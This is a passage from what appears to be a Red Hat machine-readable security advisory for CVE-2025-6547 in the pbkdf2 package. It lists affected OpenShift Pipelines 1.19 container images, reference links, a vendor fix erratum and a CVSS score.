"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-6547"
},
{
"category": "external",
"summary": "RHBZ#2374378",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2374378"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-6547",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6547"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-6547",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6547"
},
{
"category": "external",
"summary": "https://github.com/browserify/pbkdf2/commit/e3102a8cd4830a3ac85cd0dd011cc002fdde33bb",
"url": "https://github.com/browserify/pbkdf2/commit/e3102a8cd4830a3ac85cd0dd011cc002fdde33bb"
},
{
"category": "external",
"summary": "https://github.com/browserify/pbkdf2/security/advisories/GHSA-v62p-rq8g-8h59",
"url": "https://github.com/browserify/pbkdf2/security/advisories/GHSA-v62p-rq8g-8h59"
}
],
"release_date": "2025-06-23T19:00:45.472000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-09T10:09:13+00:00",
"details": "Red Hat OpenShift Pipelines is a cloud-native, continuous integration and\ncontinuous delivery (CI/CD) solution based on Kubernetes resources.\nIt uses Tekton building blocks to automate deployments across multiple\nplatforms by abstracting away the underlying implementation details.\nTekton introduces a number of standard custom resource definitions (CRDs)\nfor defining CI/CD pipelines that are portable across Kubernetes distributions.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22905"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
